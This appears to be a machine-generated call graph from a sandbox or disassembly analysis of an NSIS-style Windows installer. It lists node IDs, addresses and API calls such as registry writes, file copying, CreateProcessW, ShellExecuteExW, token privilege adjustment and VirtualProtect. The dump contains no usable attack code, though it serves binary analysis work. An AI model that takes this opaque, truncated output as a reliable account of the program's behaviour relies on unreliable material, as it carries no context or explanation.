4982->4983 4984 4016d2 GetFullPathNameW 4983->4984 4985 4016ec 4984->4985 4986 40170e 4984->4986 4985->4986 4989 4065fd 2 API calls 4985->4989 4987 401723 GetShortPathNameW 4986->4987 4988 402ac5 4986->4988 4987->4988 4990 4016fe 4989->4990 4990->4986 4992 4062ba lstrcpynW 4990->4992 4992->4986 4993 40234e 4994 402c41 17 API calls 4993->4994 4995 40235d 4994->4995 4996 402c41 17 API calls 4995->4996 4997 402366 4996->4997 4998 402c41 17 API calls 4997->4998 4999 402370 GetPrivateProfileStringW 4998->4999 5000 401b53 5001 402c41 17 API calls 5000->5001 5002 401b5a 5001->5002 5003 402c1f 17 API calls 5002->5003 5004 401b63 wsprintfW 5003->5004 5005 402ac5 5004->5005 5006 401956 5007 402c41 17 API calls 5006->5007 5008 40195d lstrlenW 5007->5008 5009 402592 5008->5009 5010 4014d7 5011 402c1f 17 API calls 5010->5011 5012 4014dd Sleep 5011->5012 5014 402ac5 5012->5014 4784 403d58 4785 403d70 4784->4785 4786 403eab 4784->4786 4785->4786 4789 403d7c 4785->4789 4787 403efc 4786->4787 4788 403ebc GetDlgItem GetDlgItem 4786->4788 4793 403f56 4787->4793 4801 401389 2 API calls 4787->4801 4792 404231 18 API calls 4788->4792 4790 403d87 SetWindowPos 4789->4790 4791 403d9a 4789->4791 4790->4791 4794 403db7 4791->4794 4795 403d9f ShowWindow 4791->4795 4796 403ee6 SetClassLongW 4792->4796 4797 40427d SendMessageW 4793->4797 4802 403ea6 4793->4802 4798 403dd9 4794->4798 4799 403dbf DestroyWindow 4794->4799 4795->4794 4800 40140b 2 API calls 4796->4800 4825 403f68 4797->4825 4804 403dde SetWindowLongW 4798->4804 4805 403def 4798->4805 4803 4041db 4799->4803 4800->4787 4806 403f2e 4801->4806 4803->4802 4812 4041eb ShowWindow 4803->4812 4804->4802 4809 403e98 4805->4809 4810 403dfb GetDlgItem 4805->4810 4806->4793 4811 403f32 SendMessageW 4806->4811 4807 40140b 2 API calls 4807->4825 4808 4041bc DestroyWindow EndDialog 4808->4803 4865 404298 4809->4865 4813 403e2b 4810->4813 4814 403e0e SendMessageW IsWindowEnabled 4810->4814 4811->4802 4812->4802 4817 403e38 4813->4817 4818 403e4b 4813->4818 4819 403e7f SendMessageW 4813->4819 4828 403e30 4813->4828 4814->4802 4814->4813 4816 4062dc 17 API calls 4816->4825 4817->4819 4817->4828 4822 403e53 4818->4822 4823 403e68 4818->4823 4819->4809 4821 404231 18 API calls 4821->4825 4826 40140b 2 API calls 4822->4826 4827 40140b 2 API calls 4823->4827 4824 403e66 4824->4809 4825->4802 4825->4807 4825->4808 4825->4816 4825->4821 4846 4040fc DestroyWindow 4825->4846 4856 404231 4825->4856 4826->4828 4829 403e6f 4827->4829 4862 40420a 4828->4862 4829->4809 4829->4828 4831 403fe3 GetDlgItem 4832 404000 ShowWindow KiUserCallbackDispatcher 4831->4832 4833 403ff8 4831->4833 4859 404253 EnableWindow 4832->4859 4833->4832 4835 40402a EnableWindow 4840 40403e 4835->4840 4836 404043 GetSystemMenu EnableMenuItem SendMessageW 4837 404073 SendMessageW 4836->4837 4836->4840 4837->4840 4839 403d39 18 API calls 4839->4840 4840->4836 4840->4839 4860 404266 SendMessageW 4840->4860 4861 4062ba lstrcpynW 4840->4861 4842 4040a2 lstrlenW 4843 4062dc 17 API calls 4842->4843 4844 4040b8 SetWindowTextW 4843->4844 4845 401389 2 API calls 4844->4845 4845->4825 4846->4803 4847 404116 CreateDialogParamW 4846->4847 4847->4803 4848 404149 4847->4848 4849 404231 18 API calls 4848->4849 4850 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4849->4850 4851 401389 2 API calls 4850->4851 4852 40419a 4851->4852 4852->4802 4853 4041a2 ShowWindow 4852->4853 4854 40427d SendMessageW 4853->4854 4855 4041ba 4854->4855 4855->4803 4857 4062dc 17 API calls 4856->4857 4858 40423c SetDlgItemTextW 4857->4858 4858->4831 4859->4835 4860->4840 4861->4842 4863 404211 4862->4863 4864 404217 SendMessageW 4862->4864 4863->4864 4864->4824 4866 40435b 4865->4866 4867 4042b0 GetWindowLongW 4865->4867 4866->4802 4867->4866 4868 4042c5 4867->4868 4868->4866 4869 4042f2 GetSysColor 4868->4869 4870 4042f5 4868->4870 4869->4870 4871 404305 SetBkMode 4870->4871 4872 4042fb SetTextColor 4870->4872 4873 404323 4871->4873 4874 40431d GetSysColor 4871->4874 4872->4871 4875 404334 4873->4875 4876 40432a SetBkColor 4873->4876 4874->4873 4875->4866 4877 404347 DeleteObject 4875->4877 4878 40434e CreateBrushIndirect 4875->4878 4876->4875 4877->4878 4878->4866 5015 401f58 5016 402c41 17 API calls 5015->5016 5017 401f5f 5016->5017 5018 4065fd 2 API calls 5017->5018 5019 401f65 5018->5019 5021 401f76 5019->5021 5022 406201 wsprintfW 5019->5022 5022->5021 5023 402259 5024 402c41 17 API calls 5023->5024 5025 40225f 5024->5025 5026 402c41 17 API calls 5025->5026 5027 402268 5026->5027 5028 402c41 17 API calls 5027->5028 5029 402271 5028->5029 5030 4065fd 2 API calls 5029->5030 5031 40227a 5030->5031 5032 40228b lstrlenW lstrlenW 5031->5032 5036 40227e 5031->5036 5034 405322 24 API calls 5032->5034 5033 405322 24 API calls 5037 402286 5033->5037 5035 4022c9 SHFileOperationW 5034->5035 5035->5036 5035->5037 5036->5033 5038 4046db 5039 404711 5038->5039 5040 4046eb 5038->5040 5042 404298 8 API calls 5039->5042 5041 404231 18 API calls 5040->5041 5043 4046f8 SetDlgItemTextW 5041->5043 5044 40471d 5042->5044 5043->5039 4890 40175c 4891 402c41 17 API calls 4890->4891 4892 401763 4891->4892 4893 405ddf 2 API calls 4892->4893 4894 40176a 4893->4894 4895 405ddf 2 API calls 4894->4895 4895->4894 5045 4022dd 5046 4022e4 5045->5046 5050 4022f7 5045->5050 5047 4062dc 17 API calls 5046->5047 5048 4022f1 5047->5048 5049 405920 MessageBoxIndirectW 5048->5049 5049->5050 5051 401d5d GetDlgItem GetClientRect 5052 402c41 17 API calls 5051->5052 5053 401d8f LoadImageW SendMessageW 5052->5053 5054 401dad DeleteObject 5053->5054 5055 402ac5 5053->5055 5054->5055 5056 405461 5057 405482 GetDlgItem GetDlgItem GetDlgItem 5056->5057 5058 40560b 5056->5058 5101 404266 SendMessageW 5057->5101 5060 405614 GetDlgItem CreateThread CloseHandle 5058->5060 5061 40563c 5058->5061 5060->5061 5063 405667 5061->5063 5064 405653 ShowWindow ShowWindow 5061->5064 5065 40568c 5061->5065 5062 4054f2 5067 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5062->5067 5066 4056c7 5063->5066 5069 4056a1 ShowWindow 5063->5069 5070 40567b 5063->5070 5103 404266 SendMessageW 5064->5103 5071 404298 8 API calls 5065->5071 5066->5065 5076 4056d5 SendMessageW 5066->5076 5074 405567 5067->5074 5075 40554b SendMessageW SendMessageW 5067->5075 5072 4056c1 5069->5072 5073 4056b3 5069->5073 5077 40420a SendMessageW 5070->5077 5078 40569a 5071->5078 5080 40420a SendMessageW 5072->5080 5079 405322 24 API calls 5073->5079 5081 40557a 5074->5081 5082 40556c SendMessageW 5074->5082 5075->5074 5076->5078 5083 4056ee CreatePopupMenu 5076->5083 5077->5065 5079->5072 5080->5066 5085 404231 18 API calls 5081->5085 5082->5081 5084 4062dc 17 API calls 5083->5084 5086 4056fe AppendMenuW 5084->5086 5087 40558a 5085->5087 5088 40571b GetWindowRect 5086->5088 5089 40572e TrackPopupMenu 5086->5089 5090 405593 ShowWindow 5087->5090 5091 4055c7 GetDlgItem SendMessageW 5087->5091 5088->5089 5089->5078 5093 405749 5089->5093 5094 4055a9 ShowWindow 5090->5094 5096 4055b6 5090->5096 5091->5078 5092 4055ee SendMessageW SendMessageW 5091->5092 5092->5078 5095 405765 SendMessageW 5093->5095 5094->5096 5095->5095 5097 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5095->5097 5102 404266 SendMessageW 5096->5102 5099 4057a7 SendMessageW 5097->5099 5099->5099 5100 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5099->5100 5100->5078 5101->5062 5102->5091 5103->5063 5104 401563 5105 402a6b 5104->5105 5108 406201 wsprintfW 5105->5108 5107 402a70 5108->5107 4092 4023e4 4093 402c41 17 API calls 4092->4093 4094 4023f6 4093->4094 4095 402c41 17 API calls 4094->4095 4096 402400 4095->4096 4109 402cd1 4096->4109 4099 402438 4102 402444 4099->4102 4133 402c1f 4099->4133 4100 40288b 4101 402c41 17 API calls 4103 40242e lstrlenW 4101->4103 4105 402463 RegSetValueExW 4102->4105 4113 403116 4102->4113 4103->4099 4107 402479 RegCloseKey 4105->4107 4107->4100 4110 402cec 4109->4110 4136 406155 4110->4136 4114 40312f 4113->4114 4115 40315d 4114->4115 4143 403347 SetFilePointer 4114->4143 4140 403331 4115->4140 4119 4032ca 4121 40330c 4119->4121 4126 4032ce 4119->4126 4120 40317a GetTickCount 4122 4032b4 4120->4122 4129 4031c9 4120->4129 4124 403331 ReadFile 4121->4124 4122->4105 4123 403331 ReadFile 4123->4129 4124->4122 4125 403331 ReadFile 4125->4126 4126->4122 4126->4125 4127 405e62 WriteFile 4126->4127 4127->4126 4128 40321f GetTickCount 4128->4129 4129->4122 4129->4123 4129->4128 4130 403244 MulDiv wsprintfW 4129->4130 4132 405e62 WriteFile 4129->4132 4131 405322 24 API calls 4130->4131 4131->4129 4132->4129 4134 4062dc 17 API calls 4133->4134 4135 402c34 4134->4135 4135->4102 4137 406164 4136->4137 4138 402410 4137->4138 4139 40616f RegCreateKeyExW 4137->4139 4138->4099 4138->4100 4138->4101 4139->4138 4141 405e33 ReadFile 4140->4141 4142 403168 4141->4142 4142->4119 4142->4120 4142->4122 4143->4115 5109 404367 lstrcpynW lstrlenW 5110 402868 5111 402c41 17 API calls 5110->5111 5112 40286f FindFirstFileW 5111->5112 5113 402897 5112->5113 5117 402882 5112->5117 5118 406201 wsprintfW 5113->5118 5115 4028a0 5119 4062ba lstrcpynW 5115->5119 5118->5115 5119->5117 5120 401968 5121 402c1f 17 API calls 5120->5121 5122 40196f 5121->5122 5123 402c1f 17 API calls 5122->5123 5124 40197c 5123->5124 5125 402c41 17 API calls 5124->5125 5126 401993 lstrlenW 5125->5126 5128 4019a4 5126->5128 5127 4019e5 5128->5127 5132 4062ba lstrcpynW 5128->5132 5130 4019d5 5130->5127 5131 4019da lstrlenW 5130->5131 5131->5127 5132->5130 5133 403968 5134 403973 5133->5134 5135 403977 5134->5135 5136 40397a GlobalAlloc 5134->5136 5136->5135 5137 40166a 5138 402c41 17 API calls 5137->5138 5139 401670 5138->5139 5140 4065fd 2 API calls 5139->5140 5141 401676 5140->5141 4193 6f3d2993 4194 6f3d29e3 4193->4194 4195 6f3d29a3 VirtualProtect 4193->4195 4195->4194 4225 4027ef 4226 4027f6 4225->4226 4229 402a70 4225->4229 4227 402c1f 17 API calls 4226->4227 4228 4027fd 4227->4228 4230 40280c SetFilePointer 4228->4230 4230->4229 4231 40281c 4230->4231 4233 406201 wsprintfW 4231->4233 4233->4229 4234 40176f 4235 402c41 17 API calls 4234->4235 4236 401776 4235->4236 4237 401796 4236->4237 4238 40179e 4236->4238 4273 4062ba lstrcpynW 4237->4273 4274 4062ba lstrcpynW 4238->4274 4241 40179c 4245 40654e 5 API calls 4241->4245 4242 4017a9 4243 405b8f 3 API calls 4242->4243 4244 4017af lstrcatW 4243->4244 4244->4241 4261 4017bb 4245->4261 4246 4065fd 2 API calls 4246->4261 4247 405d8b 2 API calls 4247->4261 4249 4017cd CompareFileTime 4249->4261 4250 40188d 4252 405322 24 API calls 4250->4252 4251 401864 4254 405322 24 API calls 4251->4254 4271 401879 4251->4271 4253 401897 4252->4253 4256 403116 31 API calls 4253->4256 4254->4271 4255 4062ba lstrcpynW 4255->4261 4257 4018aa 4256->4257 4258 4018be SetFileTime 4257->4258 4260 4018d0 FindCloseChangeNotification 4257->4260 4258->4260 4259 4062dc 17 API calls 4259->4261 4262 4018e1 4260->4262 4260->4271 4261->4246 4261->4247 4261->4249 4261->4250 4261->4251 4261->4255 4261->4259 4272 405db0 GetFileAttributesW CreateFileW 4261->4272 4275 405920 4261->4275 4263 4018e6 4262->4263 4264 4018f9 4262->4264 4265 4062dc 17 API calls 4263->4265 4266 4062dc 17 API calls 4264->4266 4268 4018ee lstrcatW 4265->4268 4269 401901 4266->4269 4268->4269 4270 405920 MessageBoxIndirectW 4269->4270 4270->4271 4272->4261 4273->4241 4274->4242 4276 405935 4275->4276 4277 405981 4276->4277 4278 405949 MessageBoxIndirectW 4276->4278 4277->4261 4278->4277 5142 4043f0 5144 404408 5142->5144 5145 404522 5142->5145 5143 40458c 5146 404656 5143->5146 5147 404596 GetDlgItem 5143->5147 5148 404231 18 API calls 5144->5148 5145->5143 5145->5146 5151 40455d GetDlgItem SendMessageW 5145->5151 5153 404298 8 API calls 5146->5153 5149 4045b0 5147->5149 5150 404617 5147->5150 5152 40446f 5148->5152 5149->5150 5158 4045d6 SendMessageW LoadCursorW SetCursor 5149->5158 5150->5146 5154 404629 5150->5154 5175 404253 EnableWindow 5151->5175 5156 404231 18 API calls 5152->5156 5157 404651 5153->5157 5160 40463f 5154->5160 5161 40462f SendMessageW 5154->5161 5163 40447c CheckDlgButton 5156->5163 5179 40469f 5158->5179 5160->5157 5165 404645 SendMessageW 5160->5165 5161->5160 5162 404587 5176 40467b 5162->5176 5173 404253 EnableWindow 5163->5173 5165->5157 5168 40449a GetDlgItem 5174 404266 SendMessageW 5168->5174 5170 4044b0 SendMessageW 5171 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5170->5171 5172 4044cd GetSysColor 5170->5172 5171->5157 5172->5171 5173->5168 5174->5170 5175->5162 5177 404689 5176->5177 5178 40468e SendMessageW 5176->5178 5177->5178 5178->5143 5182 4058e6 ShellExecuteExW 5179->5182 5181 404605 LoadCursorW SetCursor 5181->5150 5182->5181 5183 401a72 5184 402c1f 17 API calls 5183->5184 5185 401a7b 5184->5185 5186 402c1f 17 API calls 5185->5186 5187 401a20 5186->5187 5188 401cf3 5189 402c1f 17 API calls 5188->5189 5190 401cf9 IsWindow 5189->5190 5191 401a20 5190->5191 5192 401573 5193 401583 ShowWindow 5192->5193 5194 40158c 5192->5194 5193->5194 5195 402ac5 5194->5195 5196 40159a ShowWindow 5194->5196 5196->5195 5197 402df3 5198 402e05 SetTimer 5197->5198 5200 402e1e 5197->5200 5198->5200 5199 402e73 5200->5199 5201 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5200->5201 5201->5199 5202 4014f5 SetForegroundWindow 5203 402ac5 5202->5203 5204 402576 5205 402c41 17 API calls 5204->5205 5206 40257d 5205->5206 5209 405db0 GetFileAttributesW CreateFileW 5206->5209 5208 402589 5209->5208 4761 401b77 4762 401b84 4761->4762 4763 401bc8 4761->4763 4766 401c0d 4762->4766 4771 401b9b 4762->4771 4764 401bf2 GlobalAlloc 4763->4764 4765 401bcd 4763->4765 4768 4062dc 17 API calls 4764->4768 4779 4022f7 4765->4779 4782 4062ba lstrcpynW 4765->4782 4767 4062dc 17 API calls 4766->4767 4766->4779 4769 4022f1 4767->4769 4768->4766 4774 405920 MessageBoxIndirectW 4769->4774 4780 4062ba lstrcpynW 4771->4780 4772 401bdf GlobalFree 4772->4779 4774->4779 4775 401baa 4781 4062ba lstrcpynW 4775->4781 4777 401bb9 4783 4062ba lstrcpynW 4777->4783 4780->4775 4781->4777 4782->4772 4783->4779 4879 4024f8 4880 402c81 17 API calls 4879->4880 4881 402502 4880->4881 4882 402c1f 17 API calls 4881->4882 4883 40250b 4882->4883 4884 40288b 4883->4884 4885 402533 RegEnumValueW 4883->4885 4886 402527 RegEnumKeyW 4883->4886 4887 402548 4885->4887 4888 40254f RegCloseKey 4885->4888 4886->4888 4887->4888 4888->4884 5210 404a78 5211 404aa4 5210->5211 5212 404a88 5210->5212 5214 404ad7 5211->5214 5215 404aaa SHGetPathFromIDListW 5211->5215 5221 405904 GetDlgItemTextW 5212->5221 5217 404ac1 SendMessageW 5215->5217 5218 404aba 5215->5218 5216 404a95 SendMessageW 5216->5211 5217->5214 5220 40140b 2 API calls 5218->5220 5220->5217 5221->5216 5222 40167b 5223 402c41 17 API calls 5222->5223 5224 401682 5223->5224 5225 402c41 17 API calls 5224->5225 5226 40168b 5225->5226 5227 402c41 17 API calls 5226->5227 5228 401694 MoveFileW 5227->5228 5229 4016a7 5228->5229 5235 4016a0 5228->5235 5231 4065fd 2 API calls 5229->5231 5233 402250 5229->5233 5230 401423 24 API calls 5230->5233 5232 4016b6 5231->5232 5232->5233 5234 406080 36 API calls 5232->5234 5234->5235 5235->5230 5236 401e7d 5237 402c41 17 API calls 5236->5237 5238 401e83 5237->5238 5239 402c41 17 API calls 5238->5239 5240 401e8c 5239->5240 5241 402c41 17 API calls 5240->5241 5242 401e95 5241->5242 5243 402c41 17 API calls 5242->5243 5244 401e9e 5243->5244 5245 401423 24 API calls 5244->5245 5246 401ea5 5245->5246 5253 4058e6 ShellExecuteExW 5246->5253 5248 401ee7 5251 40288b 5248->5251 5254 406745 WaitForSingleObject 5248->5254 5250 401f01 CloseHandle 5250->5251 5253->5248 5255 40675f 5254->5255 5256 406771 GetExitCodeProcess 5255->5256 5257 4066d0 2 API calls 5255->5257 5256->5250 5258 406766 WaitForSingleObject 5257->5258 5258->5255 5259 6f3d1000 5260 6f3d101b 5 API calls 5259->5260 5261 6f3d1019 5260->5261 5262 4019ff 5263 402c41 17 API calls 5262->5263 5264 401a06 5263->5264 5265 402c41 17 API calls 5264->5265 5266 401a0f 5265->5266 5267 401a16 lstrcmpiW 5266->5267 5268 401a28 lstrcmpW 5266->5268 5269 401a1c 5267->5269 5268->5269 5270 401000 5271 401037 BeginPaint GetClientRect 5270->5271 5272 40100c DefWindowProcW 5270->5272 5274 4010f3 5271->5274 5277 401179 5272->5277 5275 401073 CreateBrushIndirect FillRect DeleteObject 5274->5275 5276 4010fc 5274->5276 5275->5274 5278 401102 CreateFontIndirectW 5276->5278 5279 401167 EndPaint 5276->5279 5278->5279 5280 401112 6 API calls 5278->5280 5279->5277 5280->5279 5281 6f3d22fd 5282 6f3d2367 5281->5282 5283 6f3d2372 GlobalAlloc 5282->5283 5284 6f3d2391 5282->5284 5283->5282 5285 401503 5286 40150b 5285->5286 5288 40151e 5285->5288 5287 402c1f 17 API calls 5286->5287 5287->5288 4144 402484 4155 402c81 4144->4155 4147 402c41 17 API calls 4148 402497 4147->4148 4149 4024a2 RegQueryValueExW 4148->4149 4152 40288b 4148->4152 4150 4024c2 4149->4150 4151 4024c8 RegCloseKey 4149->4151 4150->4151 4160 406201 wsprintfW 4150->4160 4151->4152 4156 402c41 17 API calls 4155->4156 4157 402c98 4156->4157 4158 406127 RegOpenKeyExW 4157->4158 4159 40248e 4158->4159 4159->4147 4160->4151 5289 402104 5290 402c41 17 API calls 5289->5290 5291 40210b 5290->5291 5292 402c41 17 API calls 5291->5292 5293 402115 5292->5293 5294 402c41 17 API calls 5293->5294 5295 40211f 5294->5295 5296 402c41 17 API calls 5295->5296 5297 402129 5296->5297 5298 402c41 17 API calls 5297->5298 5300 402133 5298->5300 5299 402172 CoCreateInstance 5304 402191 5299->5304 5300->5299 5301 402c41 17 API calls 5300->5301 5301->5299 5302 401423 24 API calls 5303 402250 5302->5303 5304->5302 5304->5303 5305 401f06 5306 402c41 17 API calls 5305->5306 5307 401f0c 5306->5307 5308 405322 24 API calls 5307->5308 5309 401f16 5308->5309 5310 4058a3 2 API calls 5309->5310 5312 401f1c 5310->5312 5311 40288b 5312->5311 5313 401f3f CloseHandle 5312->5313 5315 406745 5 API calls 5312->5315 5313->5311 5316 401f31 5315->5316 5316->5313 5318 406201 wsprintfW 5316->5318 5318->5313 5319 40190c 5320 401943 5319->5320 5321 402c41 17 API calls 5320->5321 5322 401948 5321->5322 5323 4059cc 67 API calls 5322->5323 5324 401951 5323->5324 5325 40230c 5326 402314 5325->5326 5327 40231a 5325->5327 5328 402c41 17 API calls 5326->5328 5329 402c41 17 API calls 5327->5329 5331 402328 5327->5331 5328->5327 5329->5331 5330 402c41 17 API calls 5333 40233f WritePrivateProfileStringW 5330->5333 5332 402c41 17 API calls 5331->5332 5334 402336 5331->5334 5332->5334 5334->5330 5335 401f8c 5336 402c41 17 API calls 5335->5336 5337 401f93 5336->5337 5338 406694 5 API calls 5337->5338 5339 401fa2 5338->5339 5340 401fbe GlobalAlloc 5339->5340 5341 402026 5339->5341 5340->5341 5342 401fd2 5340->5342 5343 406694 5 API calls 5342->5343 5344 401fd9 5343->5344 5345 406694 5 API calls 5344->5345 5346 401fe3 5345->5346 5346->5341 5350 406201 wsprintfW 5346->5350 5348 402018 5351 406201 wsprintfW 5348->5351 5350->5348 5351->5341 4196 40238e 4197 4023c1 4196->4197 4198 402396 4196->4198 4199 402c41 17 API calls 4197->4199 4200 402c81 17 API calls 4198->4200 4201 4023c8 4199->4201 4202 40239d 4200->4202 4208 402cff 4201->4208 4203 4023a7 4202->4203 4206 4023d5 4202->4206 4205 402c41 17 API calls 4203->4205 4207 4023ae RegDeleteValueW RegCloseKey 4205->4207 4207->4206 4209 402d13 4208->4209 4210 402d0c 4208->4210 4209->4210 4212 402d44 4209->4212 4210->4206 4213 406127 RegOpenKeyExW 4212->4213 4214 402d72 4213->4214 4215 402dec 4214->4215 4219 402d76 4214->4219 4215->4210 4216 402d98 RegEnumKeyW 4217 402daf RegCloseKey 4216->4217 4216->4219 4220 406694 5 API calls 4217->4220 4218 402dd0 RegCloseKey 4218->4215 4219->4216 4219->4217 4219->4218 4221 402d44 6 API calls 4219->4221 4222 402dbf 4220->4222 4221->4219 4223 402de0 RegDeleteKeyW 4222->4223 4224 402dc3 4222->4224 4223->4215 4224->4215 4279 40338f SetErrorMode GetVersion 4280 4033ce 4279->4280 4281 4033d4 4279->4281 4282 406694 5 API calls 4280->4282 4283 406624 3 API calls 4281->4283 4282->4281 4284 4033ea lstrlenA 4283->4284 4284->4281 4285 4033fa 4284->4285 4286 406694 5 API calls 4285->4286 4287 403401 4286->4287 4288 406694 5 API calls 4287->4288 4289 403408 4288->4289 4290 406694 5 API calls 4289->4290 4291 403414 #17 OleInitialize SHGetFileInfoW 4290->4291 4369 4062ba lstrcpynW 4291->4369 4294 403460 GetCommandLineW 4370 4062ba lstrcpynW 4294->4370 4296 403472 4297 405bbc CharNextW 4296->4297 4298 403497 CharNextW 4297->4298 4299 4035c1 GetTempPathW 4298->4299 4309 4034b0 4298->4309 4371 40335e 4299->4371 4301 4035d9 4302 403633 DeleteFileW 4301->4302 4303 4035dd GetWindowsDirectoryW lstrcatW 4301->4303 4381 402edd GetTickCount GetModuleFileNameW 4302->4381 4304 40335e 12 API calls 4303->4304 4307 4035f9 4304->4307 4305 405bbc CharNextW 4305->4309 4307->4302 4310 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4307->4310 4308 403647 4319 405bbc CharNextW 4308->4319 4353 4036ea 4308->4353 4364 4036fa 4308->4364 4309->4305 4312 4035ac 4309->4312 4314 4035aa 4309->4314 4313 40335e 12 API calls 4310->4313 4465 4062ba lstrcpynW 4312->4465 4317 40362b 4313->4317 4314->4299 4317->4302 4317->4364 4331 403666 4319->4331 4320 403834 4323 4038b8 ExitProcess 4320->4323 4324 40383c GetCurrentProcess OpenProcessToken 4320->4324 4321 403714 4322 405920 MessageBoxIndirectW 4321->4322 4328 403722 ExitProcess 4322->4328 4329 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4324->4329 4330 403888 4324->4330 4326 4036c4 4332 405c97 18 API calls 4326->4332 4327 40372a 4333 40588b 5 API calls 4327->4333 4329->4330 4334 406694 5 API calls 4330->4334 4331->4326 4331->4327 4335 4036d0 4332->4335 4336 40372f lstrcatW 4333->4336 4343 40388f 4334->4343 4335->4364 4466 4062ba lstrcpynW 4335->4466 4337 403740 lstrcatW 4336->4337 4338 40374b lstrcatW lstrcmpiW 4336->4338 4337->4338 4342 403767 4338->4342 4338->4364 4339 4038a4 ExitWindowsEx 4339->4323 4340 4038b1 4339->4340 4480 40140b 4340->4480 4346 403773 4342->4346 4347 40376c 4342->4347 4343->4339 4343->4340 4345 4036df 4467 4062ba lstrcpynW 4345->4467 4348 40586e 2 API calls 4346->4348 4350 4057f1 4 API calls 4347->4350 4352 403778 SetCurrentDirectoryW 4348->4352 4351 403771 4350->4351 4351->4352 4354 403793 4352->4354 4355 403788 4352->4355 4409 4039aa 4353->4409 4476 4062ba lstrcpynW 4354->4476 4475 4062ba lstrcpynW 4355->4475 4358 4062dc 17 API calls 4359 4037d2 DeleteFileW 4358->4359 4360 4037df CopyFileW 4359->4360 4366 4037a1 4359->4366 4360->4366 4361 403828 4362 406080 36 API calls 4361->4362 4362->4364 4363 406080 36 API calls 4363->4366 4468 4038d0 4364->4468 4365 4062dc 17 API calls 4365->4366 4366->4358 4366->4361 4366->4363 4366->4365 4368 403813 CloseHandle 4366->4368 4477 4058a3 CreateProcessW 4366->4477 4368->4366 4369->4294 4370->4296 4372 40654e 5 API calls 4371->4372 4374 40336a 4372->4374 4373 403374 4373->4301 4374->4373 4375 405b8f 3 API calls 4374->4375 4376 40337c 4375->4376 4377 40586e 2 API calls 4376->4377 4378 403382 4377->4378 4483 405ddf 4378->4483 4487 405db0 GetFileAttributesW CreateFileW 4381->4487 4383 402f1d 4384 402f2d 4383->4384 4488 4062ba lstrcpynW 4383->4488 4384->4308 4386 402f43 4387 405bdb 2 API calls 4386->4387 4388 402f49 4387->4388 4489 4062ba lstrcpynW 4388->4489 4390 402f54 GetFileSize 4405 402f6b 4390->4405 4406 403050 4390->4406 4392 403331 ReadFile 4392->4405 4393 403059 4393->4384 4394 403089 GlobalAlloc 4393->4394 4502 403347 SetFilePointer 4393->4502 4501 403347 SetFilePointer 4394->4501 4396 4030bc 4399 402e79 6 API calls 4396->4399 4398 4030a4 4401 403116 31 API calls 4398->4401 4399->4384 4400 403072 4402 403331 ReadFile 4400->4402 4407 4030b0 4401->4407 4403 40307d 4402->4403 4403->4384 4403->4394 4404 402e79 6 API calls 4404->4405 4405->4384 4405->4392 4405->4396 4405->4404 4405->4406 4490 402e79 4406->4490 4407->4384 4407->4407 4408 4030ed SetFilePointer 4407->4408 4408->4384 4410 406694 5 API calls 4409->4410 4411 4039be 4410->4411 4412 4039c4 4411->4412 4413 4039d6 4411->4413 4515 406201 wsprintfW 4412->4515 4414 406188 3 API calls 4413->4414 4415 403a06 4414->4415 4416 403a25 lstrcatW 4415->4416 4418 406188 3 API calls 4415->4418 4419 4039d4 4416->4419 4418->4416 4507 403c80 4419->4507 4422 405c97 18 API calls 4423 403a57 4422->4423 4424 403aeb 4423->4424 4426 406188 3 API calls 4423->4426 4425 405c97 18 API calls 4424->4425 4427 403af1 4425->4427 4428 403a89 4426->4428 4429 403b01 LoadImageW 4427->4429 4432 4062dc 17 API calls 4427->4432 4428->4424 4435 403aaa lstrlenW 4428->4435 4439 405bbc CharNextW 4428->4439 4430 403ba7 4429->4430 4431 403b28 RegisterClassW 4429->4431 4434 40140b 2 API calls 4430->4434 4433 403b5e SystemParametersInfoW CreateWindowExW 4431->4433 4464 403bb1 4431->4464 4432->4429 4433->4430 4438 403bad 4434->4438 4436 403ab8 lstrcmpiW 4435->4436 4437 403ade 4435->4437 4436->4437 4440 403ac8 GetFileAttributesW 4436->4440 4441 405b8f 3 API calls 4437->4441 4444 403c80 18 API calls 4438->4444 4438->4464 4442 403aa7 4439->4442 4443 403ad4 4440->4443 4445 403ae4 4441->4445 4442->4435 4443->4437 4446 405bdb 2 API calls 4443->4446 4447 403bbe 4444->4447 4516 4062ba lstrcpynW 4445->4516 4446->4437 4449 403bca ShowWindow 4447->4449 4450 403c4d 4447->4450 4452 406624 3 API calls 4449->4452 4517 4053f5 OleInitialize 4450->4517 4454 403be2 4452->4454 4453 403c53 4455 403c57 4453->4455 4456 403c6f 4453->4456 4457 403bf0 GetClassInfoW 4454->4457 4459 406624 3 API calls 4454->4459 4463 40140b 2 API calls 4455->4463 4455->4464 4458 40140b 2 API calls 4456->4458 4460 403c04 GetClassInfoW RegisterClassW 4457->4460 4461 403c1a DialogBoxParamW 4457->4461 4458->4464 4459->4457 4460->4461 4462 40140b 2 API calls 4461->4462 4462->4464 4463->4464 4464->4364 4465->4314 4466->4345 4467->4353 4469 4038e8 4468->4469 4470 4038da CloseHandle 4468->4470 4535 403915 4469->4535 4470->4469 4473 4059cc 67 API calls 4474 403703 OleUninitialize 4473->4474 4474->4320 4474->4321 4475->4354 4476->4366 4478 4058e2 4477->4478 4479 4058d6 CloseHandle 4477->4479 4478->4366 4479->4478 4481 401389 2 API calls 4480->4481 4482 401420 4481->4482 4482->4323 4484 405dec GetTickCount GetTempFileNameW 4483->4484 4485 405e22 4484->4485 4486 40338d 4484->4486 4485->4484 4485->4486 4486->4301 4487->4383 4488->4386 4489->4390 4491 402e82 4490->4491 4492 402e9a 4490->4492 4493 402e92 4491->4493 4494 402e8b DestroyWindow 4491->4494 4495 402ea2 4492->4495 4496 402eaa GetTickCount 4492->4496 4493->4393 4494->4493 4503 4066d0 4495->4503 4498 402eb8 CreateDialogParamW ShowWindow 4496->4498 4499 402edb 4496->4499 4498->4499 4499->4393 4501->4398 4502->4400 4504 4066ed PeekMessageW 4503->4504 4505 4066e3 DispatchMessageW 4504->4505 4506 402ea8 4504->4506 4505->4504 4506->4393 4508 403c94 4507->4508 4524 406201 wsprintfW 4508->4524 4510 403d05 4525 403d39 4510->4525 4512 403a35 4512->4422 4513 403d0a 4513->4512 4514 4062dc 17 API calls 